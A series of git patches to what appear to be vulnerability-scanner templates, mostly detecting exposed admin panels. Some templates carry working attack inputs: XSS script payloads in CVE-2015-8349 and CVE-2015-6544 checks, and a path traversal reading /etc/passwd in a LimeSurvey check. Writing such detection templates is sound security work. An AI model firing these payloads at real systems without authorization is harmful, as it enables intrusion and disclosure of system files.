+id: identity-services-engine + +info: + name: Identity Services Engine + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22Identity+Services+Engine%22 + tags: panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/admin/' + + matchers-condition: and + matchers: + - type: word + words: + - '<title>Identity Services Engine' + + - type: status + status: + - 200 From fdbf41e8bc361d9c2545c2edeaa2385d3a4210ee Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 22:22:19 +0530 Subject: [PATCH 1267/4083] Update identity-services-engine.yaml --- exposed-panels/identity-services-engine.yaml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/exposed-panels/identity-services-engine.yaml b/exposed-panels/identity-services-engine.yaml index cef392b5d4..5699d13914 100644 --- a/exposed-panels/identity-services-engine.yaml +++ b/exposed-panels/identity-services-engine.yaml @@ -18,7 +18,3 @@ requests: - type: word words: - 'Identity Services Engine' - - - type: status - status: - - 200 From 648507fa98c5317cdef8f1426e486b7bd2191259 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 22:37:16 +0530 Subject: [PATCH 1268/4083] Create dell-openmanager-login.yaml --- exposed-panels/dell-openmanager-login.yaml | 25 ++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/dell-openmanager-login.yaml diff --git a/exposed-panels/dell-openmanager-login.yaml b/exposed-panels/dell-openmanager-login.yaml new file mode 100644 index 0000000000..539fa81bb8 --- /dev/null +++ b/exposed-panels/dell-openmanager-login.yaml @@ -0,0 +1,25 @@ +id: dell-openmanager-login + +info: + name: Dell OpenManage Switch Administrator + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=html%3A%22Dell+OpenManage+Switch+Administrator%22 + tags: panel,dell + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/config/authentication_page.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Dell OpenManage Switch Administrator' + - 'Log In' + + - type: status + status: + - 200 From d0042a49e7d8f64d5f098ef866cc0b7273d18e6b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 28 Jul 2021 22:42:58 +0530 Subject: [PATCH 1269/4083] Create xvr-login.yaml --- exposed-panels/xvr-login.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/xvr-login.yaml diff --git a/exposed-panels/xvr-login.yaml b/exposed-panels/xvr-login.yaml new file mode 100644 index 0000000000..8e1f781632 --- /dev/null +++ b/exposed-panels/xvr-login.yaml @@ -0,0 +1,23 @@ +id: xvr-login + +info: + name: XVR LOGIN + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22XVR+LOGIN%22 + tags: panel,xvr + +requests: + - method: GET + path: + - '{{BaseURL}}/login.rsp' + + matchers-condition: and + matchers: + - type: word + words: + - 'XVR LOGIN' + + - type: status + status: + - 200 From f6b2676b00b131e3791e2d13aed7377779c7eebe Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 28 Jul 2021 23:24:32 +0530 Subject: [PATCH 1270/4083] Update CVE-2015-8349.yaml --- cves/2015/CVE-2015-8349.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2015/CVE-2015-8349.yaml b/cves/2015/CVE-2015-8349.yaml index eefc6d6812..cc437482ec 100644 --- a/cves/2015/CVE-2015-8349.yaml +++ b/cves/2015/CVE-2015-8349.yaml @@ -11,13 +11,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3Cimg%2Bsrc%3Dx%2Bonerror%3Dalert%28document.domain%29%3E&advType=btype" + - "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From 1d7d286c487dc1d3baba4ffece08eb271988ccce Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 28 Jul 2021 23:28:57 +0530 Subject: [PATCH 1271/4083] Update openx-detect.yaml --- technologies/openx-detect.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/technologies/openx-detect.yaml b/technologies/openx-detect.yaml index 052a1fec36..1f43024105 100644 --- a/technologies/openx-detect.yaml +++ b/technologies/openx-detect.yaml @@ -17,6 +17,10 @@ requests: regex: - 'OpenX' + - type: status + status: + - 200 + extractors: - type: regex part: body From 49efd9fa07ea230a8670ab05abd40ffddc501ce3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 00:13:15 +0530 Subject: [PATCH 1272/4083] Update bitrix-open-redirect.yaml --- vulnerabilities/other/bitrix-open-redirect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/vulnerabilities/other/bitrix-open-redirect.yaml b/vulnerabilities/other/bitrix-open-redirect.yaml index e88df0c69b..ebe3db78d6 100644 --- a/vulnerabilities/other/bitrix-open-redirect.yaml +++ b/vulnerabilities/other/bitrix-open-redirect.yaml @@ -30,3 +30,9 @@ requests: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header + + - type: status + status: + - 302 + - 301 + condition: or From feb0af88eb2b37cace5c77886d731bb79bdaf79f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 00:16:01 +0530 Subject: [PATCH 1273/4083] Update CVE-2015-6544.yaml --- cves/2015/CVE-2015-6544.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2015/CVE-2015-6544.yaml b/cves/2015/CVE-2015-6544.yaml index efd66299ca..63d74145e0 100644 --- a/cves/2015/CVE-2015-6544.yaml +++ b/cves/2015/CVE-2015-6544.yaml @@ -12,13 +12,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%3Cimg%20src%3D%22x%22%20onerror%3Djavascript%3Aalert%28document.domain%29%3B%3E" + - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - '' + - '' part: body - type: status From 58d7691435f05e31696a9598dea90a7622fc50be Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 28 Jul 2021 13:49:30 -0500 Subject: [PATCH 1274/4083] Create dom-xss.yaml --- file/xss/dom-xss.yaml | 46 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 file/xss/dom-xss.yaml diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml new file mode 100644 index 0000000000..e5fa919c30 --- /dev/null +++ b/file/xss/dom-xss.yaml @@ -0,0 +1,46 @@ +id: dom-xss + +info: + name: DOM XSS Sources & Sinks + reference: Inspired by https://portswigger.net/blog/introducing-dom-invader + # The existence of a sink or source does not by itself indicate a vulnerability. Due diligence must be performed on the results before opening a bug report. + author: geeknik + severity: info + tags: dom,xss,file + +file: + - extensions: + - js + - ts + - html + - php + - cs + - rb + - py + + extractors: + - type: regex + name: sink + part: body + regex: + - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' + - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' + - 'fetch(\.body)?' + - 'history(\.pushState|\.replaceState)' + - '(session|local)Storage(\.setItem(\.name|\.value))' + - 'anchor(\.href|\.target)' + - 'button(\.formaction|\.value)' + - 'set(Timeout|Interval|Immediate)' + - 'script(\.src|\.textContent|\.innerText|\.innerHTML|\.appendChild|\.append)' + - 'document(\.write|\.writeln|\.implementation\.createHTMLDocument|\.domain|\.cookie|\.evaluate)' + - 'element(\.outerText|\.innerText|\.textContent|\.style\.cssText|\.innerHTML|\.outerHTML|\.insertAdjacentHTML|\.setAttribute(\.onclick|\.onmouseover|\.onmousedown|\.onmouseup|\.onkeydown|\.onkeypress|\.onkeyup|\.href|\.src|\.data|\.action|\.formaction))' + - 'location(\.href|\.replace|\.assign|\.pathname|\.protocol|\.host|\.hostname|\.hash|\.search)?' + - 'iframe(\.srcdoc|\.src)' + - 'xhr(\.open|\.send|\.setRequestHeader(\.name|\.value)?)' + - type: regex + name: source + part: body + regex: + - 'location(\.href|\.hash|\.search|\.pathname)?' + - 'window\.name' + - 'document(\.URL|\.referrer|\.documentURI|\.baseURI|\.cookie)' From 5a9656535721034c211a6658e2f6365927616b48 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Wed, 28 Jul 2021 13:51:10 -0500 Subject: [PATCH 1275/4083] Update dom-xss.yaml typo fix --- file/xss/dom-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/xss/dom-xss.yaml b/file/xss/dom-xss.yaml index e5fa919c30..52613af665 100644 --- a/file/xss/dom-xss.yaml +++ b/file/xss/dom-xss.yaml @@ -23,7 +23,7 @@ file: name: sink part: body regex: - - 'jQuery(\.globalEval|\.\$|\..constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' + - 'jQuery(\.globalEval|\.\$|\.constructor|\.parseHTML|\.has|\.init|\.index|\.add|\.append|\.appendTo|\.after|\.insertAfter|\.before|\.insertBefore|\.html|\.prepend|\.prependTo|\.replaceWith|\.replaceAll|\.wrap|\.wrapALL|\.wrapInner|\.prop\.innerHTML|\.prop\.outerHTML|\.attr\.onclick|\.attr\.onmouseover|\.attr.onmousedown|\.attr\.onmouseup|\.attr\.onkeydown|\.attr\.onkeypress|\.attr\.onkeyup|\.attr\.href|\.attr\.src|\.attr\.data|\.attr\.action|\.attr\.formaction|\.prop\.href|\.prop\.src|\.prop\.data|\.prop\.action|\.prop\.formaction)' - 'eval|Function|execScript|msSetImmediate|fetch(\.body)?|form\.action|websocket|RegExp|javascriptURL|createContextualFragment|webdatabase\.executeSql|JSON\.parse' - 'fetch(\.body)?' - 'history(\.pushState|\.replaceState)' From da3ba72db3e08e588c4803d449b8d9d0cec7aacd Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Thu, 29 Jul 2021 05:43:07 +0700 Subject: [PATCH 1276/4083] Create CVE-2020-11455.yaml --- cves/2020/CVE-2020-11455.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2020/CVE-2020-11455.yaml diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml new file mode 100644 index 0000000000..d272459b58 --- /dev/null +++ b/cves/2020/CVE-2020-11455.yaml @@ -0,0 +1,27 @@ +id: CVE-2020-11455 + +info: + name: LimeSurvey 4.1.11 - Path Traversal + author: daffainfo + severity: high + description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php. + reference: | + - https://www.exploit-db.com/exploits/48297 + - https://www.cvedetails.com/cve/CVE-2020-11455 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From c49a4b32f13f268c4cdecb4885a0180633b70af3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 10:47:01 +0530 Subject: [PATCH 1277/4083] Update android-debug-database-exposed.yaml --- misconfiguration/android-debug-database-exposed.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/misconfiguration/android-debug-database-exposed.yaml b/misconfiguration/android-debug-database-exposed.yaml index 3aaa785044..669be2723a 100644 --- a/misconfiguration/android-debug-database-exposed.yaml +++ b/misconfiguration/android-debug-database-exposed.yaml @@ -17,3 +17,7 @@ requests: - type: word words: - 'Android Debug Database' + + - type: status + status: + - 200 From 8698599b69af2fea7c7462e42b2ab6c5ffa5eef8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 11:14:48 +0530 Subject: [PATCH 1278/4083] Update sgp-login-panel.yaml --- exposed-panels/sgp-login-panel.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/sgp-login-panel.yaml b/exposed-panels/sgp-login-panel.yaml index 4a1c6e48da..15ee1ecf69 100644 --- a/exposed-panels/sgp-login-panel.yaml +++ b/exposed-panels/sgp-login-panel.yaml @@ -21,3 +21,10 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ">Ver\\. ([0-9.A-Z]+)

    " From ecc2899dfffb72a89ee6ca2a986615dd6234f0f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 11:54:34 +0530 Subject: [PATCH 1279/4083] Update cisco-sendgrid.yaml --- exposed-panels/cisco-sendgrid.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/exposed-panels/cisco-sendgrid.yaml b/exposed-panels/cisco-sendgrid.yaml index 407195e55f..d9708bf9f3 100644 --- a/exposed-panels/cisco-sendgrid.yaml +++ b/exposed-panels/cisco-sendgrid.yaml @@ -14,10 +14,17 @@ requests: matchers-condition: and matchers: - - type: word - words: - - 'Cisco ServiceGrid' + - type: regex + regex: + - '(?m)^<title>Cisco ServiceGrid (.*)<\/title>$' - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '<div class="top\-margin">Version ([0-9.]+)<\/div>' From 6edccc0bf735d683716827f7e9afbcf6e1f87949 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <cyberbossprince@gmail.com> Date: Thu, 29 Jul 2021 12:07:16 +0530 Subject: [PATCH 1280/4083] Update dell-openmanager-login.yaml --- exposed-panels/dell-openmanager-login.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/exposed-panels/dell-openmanager-login.yaml b/exposed-panels/dell-openmanager-login.yaml index 539fa81bb8..9730b557ef 100644 --- a/exposed-panels/dell-openmanager-login.yaml +++ b/exposed-panels/dell-openmanager-login.yaml @@ -13,13 +13,14 @@ requests: - '{{BaseURL}}' - '{{BaseURL}}/config/authentication_page.htm' - matchers-condition: and + matchers-condition: or matchers: - type: word words: - '<title>Dell OpenManage Switch Administrator' - - 'Log In' - - type: status - status: - - 200 + - type: word + words: + - 'Log In' + - 'device/logOff_up_menu1.htm' + condition: and From 33e66010a7a365e26c1d54b5bad4ad3f6eab600e Mon Sep 17 00:00:00 2001 From: taotao Date: Thu, 29 Jul 2021 14:45:05 +0800 Subject: [PATCH 1281/4083] Create test --- test | 1 + 1 file changed, 1 insertion(+) create mode 100644 test diff --git a/test b/test new file mode 100644 index 0000000000..3716bac871 --- /dev/null +++ b/test @@ -0,0 +1 @@ +dsjjdsd From 1f6a6a87640e457d55ff075063de0ade57fd7f8b Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 29 Jul 2021 02:50:35 -0400 Subject: [PATCH 1282/4083] Update jenkins-stack-trace.yaml file name = template id. --- vulnerabilities/jenkins/jenkins-stack-trace.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/vulnerabilities/jenkins/jenkins-stack-trace.yaml index 91d022d54e..8941ffc298 100644 --- a/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -1,4 +1,4 @@ -id: jenkins-stack-traces +id: jenkins-stack-trace info: name: Detect Jenkins in Debug Mode with Stack Traces Enabled From 8a7854719d7a63dbd36495537db96805923d1b35 Mon Sep 17 00:00:00 2001 From: taotao Date: Thu, 29 Jul 2021 15:09:54 +0800 Subject: [PATCH 1283/4083] Create cerebro-page.yaml a new template --- cerebro-page.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 cerebro-page.yaml diff --git a/cerebro-page.yaml b/cerebro-page.yaml new file mode 100644 index 0000000000..2d6620a58d --- /dev/null +++ b/cerebro-page.yaml @@ -0,0 +1,19 @@ +id: cerebro-page + +info: + name: cerebro Unauth + author: elder tao + severity: high + reference: https://github.com/lmenezes/cerebro + tags: config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/cerebro/" + matchers: + - type: word + words: + - "cerebro" + condition: and + part: body From a8972225fd9e5cfe5f0b41d4d8adc23d6992cc5a Mon Sep 17 00:00:00 2001 From: taotao Date: Thu, 29 Jul 2021 15:17:40 +0800 Subject: [PATCH 1284/4083] Delete test --- test | 1 - 1 file changed, 1 deletion(-) delete mode 100644 test diff --git a/test b/test deleted file mode 100644 index 3716bac871..0000000000 --- a/test +++ /dev/null @@ -1 +0,0 @@ -dsjjdsd From b16af3c06c5a96123b2dbde611bafe31b40e0f8b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:08:08 +0530 Subject: [PATCH 1285/4083] Update cerebro-page.yaml --- cerebro-page.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/cerebro-page.yaml b/cerebro-page.yaml index 2d6620a58d..21f2c6fdd8 100644 --- a/cerebro-page.yaml +++ b/cerebro-page.yaml @@ -10,10 +10,17 @@ info: requests: - method: GET path: - - "{{BaseURL}}/cerebro/" + - "{{BaseURL}}/login" + matchers: - type: word words: - - "cerebro" - condition: and + - "Cerebro" part: body + + extractors: + - type: regex + part: body + group: 1 + regex: + - "([a-z0-9.]+)" From 108d0224b954051855bd65bd0224f0591fab4a9b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:16:02 +0530 Subject: [PATCH 1286/4083] Update and rename cerebro-page.yaml to exposed-panels/cerebro-panel.yaml --- cerebro-page.yaml => exposed-panels/cerebro-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cerebro-page.yaml => exposed-panels/cerebro-panel.yaml (85%) diff --git a/cerebro-page.yaml b/exposed-panels/cerebro-panel.yaml similarity index 85% rename from cerebro-page.yaml rename to exposed-panels/cerebro-panel.yaml index 21f2c6fdd8..2d58e845ad 100644 --- a/cerebro-page.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -1,11 +1,11 @@ -id: cerebro-page +id: cerebro-panel info: - name: cerebro Unauth + name: Cerebro Panel author: elder tao severity: high reference: https://github.com/lmenezes/cerebro - tags: config,exposure + tags: panel,cerebro requests: - method: GET From 41c69ccee8189363f64a61aaebfeda2585dec059 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:16:30 +0530 Subject: [PATCH 1287/4083] Update cerebro-panel.yaml --- exposed-panels/cerebro-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cerebro-panel.yaml b/exposed-panels/cerebro-panel.yaml index 2d58e845ad..3e4a438539 100644 --- a/exposed-panels/cerebro-panel.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -1,4 +1,4 @@ -id: cerebro-panel +id: cerebro-panel info: name: Cerebro Panel From 3916bcff9ccb3b4384f3e24955e26597da06cd27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 29 Jul 2021 18:28:06 +0530 Subject: [PATCH 1288/4083] Update getsimple-cms-detector.yaml --- technologies/getsimple-cms-detector.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/getsimple-cms-detector.yaml b/technologies/getsimple-cms-detector.yaml index e2fda51c52..4fe0fa1917 100644 --- a/technologies/getsimple-cms-detector.yaml +++ b/technologies/getsimple-cms-detector.yaml @@ -3,7 +3,7 @@ info: author: philippedelteil severity: info description: With this template we can detect a running GetSimple CMS instance - tags: getsimple + tags: getsimple,tech requests: - method: GET path: From 8da48bbea8a7ac1b6718834a1614e8d404e51b43 Mon Sep 17 00:00:00 2001 From: Nicolas Mattiocco Date: Thu, 29 Jul 2021 15:17:15 +0200 Subject: [PATCH 1289/4083] Update git-config.yaml improvement suggestion to keep it simple and flexible --- exposures/configs/git-config.yaml | 15 ++++----------- 1 file changed, 4 insertions(+), 11 deletions(-) diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml index 9f030f2ce7..919106075f 100644 --- a/exposures/configs/git-config.yaml +++ b/exposures/configs/git-config.yaml @@ -8,16 +8,9 @@ info: tags: config,git,exposure requests: - - raw: - - | - GET /.git/config HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Content-Length: 1 - Connection: close + - method: GET + path: + - "{{BaseURL}}/.git/config" matchers-condition: and matchers: @@ -33,4 +26,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From f78a51fa18bfb0ea1dd16fefd13361855d58ed3b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 18:56:51 +0530 Subject: [PATCH 1290/4083] Create glpi-authentication.yaml --- exposed-panels/glpi-authentication.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 exposed-panels/glpi-authentication.yaml diff --git a/exposed-panels/glpi-authentication.yaml b/exposed-panels/glpi-authentication.yaml new file mode 100644 index 0000000000..492a0df24e --- /dev/null +++ b/exposed-panels/glpi-authentication.yaml @@ -0,0 +1,24 @@ +id: glpi-authentication + +info: + name: GLPI - Authentification + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22GLPI+-+Authentification%22 + tags: panel,auth + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'GLPI - Authentication' + - 'title="Powered by Teclib and contributors" class="copyright">GLPI Copyright' + + - type: status + status: + - 200 From 210a2d71467292795914f8e333ca00e617869e52 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:00:34 +0530 Subject: [PATCH 1291/4083] Create gxd5-pacs-connexion-utilisateur.yaml --- .../gxd5-pacs-connexion-utilisateur.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/gxd5-pacs-connexion-utilisateur.yaml diff --git a/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml new file mode 100644 index 0000000000..c4cb4ac680 --- /dev/null +++ b/exposed-panels/gxd5-pacs-connexion-utilisateur.yaml @@ -0,0 +1,23 @@ +id: gxd5-pacs-connexion-utilisateur + +info: + name: GXD5 Pacs Connexion utilisateur + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22GXD5+Pacs+Connexion+utilisateur%22 + tags: panel,login + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'GXD5 Pacs Connexion utilisateur' + + - type: status + status: + - 200 From 90412c464b18d40600a026636ceaef0b6d0260e5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:06:43 +0530 Subject: [PATCH 1292/4083] Create viewpoint-system-status.yaml --- exposed-panels/viewpoint-system-status.yaml | 23 +++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/viewpoint-system-status.yaml diff --git a/exposed-panels/viewpoint-system-status.yaml b/exposed-panels/viewpoint-system-status.yaml new file mode 100644 index 0000000000..326fa9876c --- /dev/null +++ b/exposed-panels/viewpoint-system-status.yaml @@ -0,0 +1,23 @@ +id: viewpoint-system-status + +info: + name: ViewPoint System Status + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 + tags: status,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ViewPoint System Status' + + - type: status + status: + - 200 From 68b19be9536a0a77a8bac712f0eca824d4ce7d8c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:07:29 +0530 Subject: [PATCH 1293/4083] Delete viewpoint-system-status.yaml --- exposed-panels/viewpoint-system-status.yaml | 23 --------------------- 1 file changed, 23 deletions(-) delete mode 100644 exposed-panels/viewpoint-system-status.yaml diff --git a/exposed-panels/viewpoint-system-status.yaml b/exposed-panels/viewpoint-system-status.yaml deleted file mode 100644 index 326fa9876c..0000000000 --- a/exposed-panels/viewpoint-system-status.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: viewpoint-system-status - -info: - name: ViewPoint System Status - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 - tags: status,exposures - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - 'ViewPoint System Status' - - - type: status - status: - - 200 From c8e11b82545cf498de69ed09b1cc59a1851a236c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:08:40 +0530 Subject: [PATCH 1294/4083] Create viewpoint-system-status.yaml --- misconfiguration/viewpoint-system-status.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 misconfiguration/viewpoint-system-status.yaml diff --git a/misconfiguration/viewpoint-system-status.yaml b/misconfiguration/viewpoint-system-status.yaml new file mode 100644 index 0000000000..326fa9876c --- /dev/null +++ b/misconfiguration/viewpoint-system-status.yaml @@ -0,0 +1,23 @@ +id: viewpoint-system-status + +info: + name: ViewPoint System Status + author: dhiyaneshDK + severity: low + reference: https://www.shodan.io/search?query=http.title%3A%22ViewPoint+System+Status%22 + tags: status,exposures + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'ViewPoint System Status' + + - type: status + status: + - 200 From 1f10c5b867dd7c7186a7f23adb5dede73d7c1d6a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:12:08 +0530 Subject: [PATCH 1295/4083] Create f-secure-policy-manager.yaml --- exposed-panels/f-secure-policy-manager.yaml | 23 +++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/f-secure-policy-manager.yaml diff --git a/exposed-panels/f-secure-policy-manager.yaml b/exposed-panels/f-secure-policy-manager.yaml new file mode 100644 index 0000000000..52a841605a --- /dev/null +++ b/exposed-panels/f-secure-policy-manager.yaml @@ -0,0 +1,23 @@ +id: f-secure-policy-manager + +info: + name: F-Secure Policy Manager Server + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22F-Secure+Policy+Manager+Server%22 + tags: login,panel + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'F-Secure Policy Manager Server' + + - type: status + status: + - 200 From 07f2647e1f7cfb10a66d36ee1eee3149da10dfd4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 29 Jul 2021 19:15:34 +0530 Subject: [PATCH 1296/4083] Create operations-automation-default-page.yaml --- .../operations-automation-default-page.yaml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/operations-automation-default-page.yaml diff --git a/technologies/operations-automation-default-page.yaml b/technologies/operations-automation-default-page.yaml new file mode 100644 index 0000000000..1a53b9bd61 --- /dev/null +++ b/technologies/operations-automation-default-page.yaml @@ -0,0 +1,23 @@ +id: operations-automation-default-page + +info: + name: Operations Automation Default Page + author: dhiyaneshDK + severity: info + reference: https://www.shodan.io/search?query=http.title%3A%22ClearPass+Policy+Manager+-+Aruba+Networks%22 + tags: tech,default + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Operations Automation Default Page' + + - type: status + status: + - 200 From 147ac0143acda410958dbd63fc1b0d22e7e55791 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 29 Jul 2021 12:29:05 -0400 Subject: [PATCH 